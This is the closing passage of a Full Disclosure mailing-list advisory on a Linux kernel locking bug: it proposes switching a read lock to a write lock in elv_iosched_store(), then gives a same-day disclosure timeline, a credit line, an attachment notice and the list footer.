Option 2: Use write lock instead of read lock in elv_iosched_store():

-   down_read(&set->update_nr_hwq_lock);
+   down_write(&set->update_nr_hwq_lock);


================================================================================
TIMELINE
================================================================================
2025-12-29: Vulnerabilities discovered
2025-12-29: Vulnerabilities confirmed
2025-12-29: Vulnerabilities disclosed

================================================================================
CREDITS
================================================================================
Discovered by: Agent Spooky's Fun Parade
================================================================================
================================================================================
================================================================================


Download attachment "agent-spooky-fun-parade.png" of type "image/png" (1763161 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ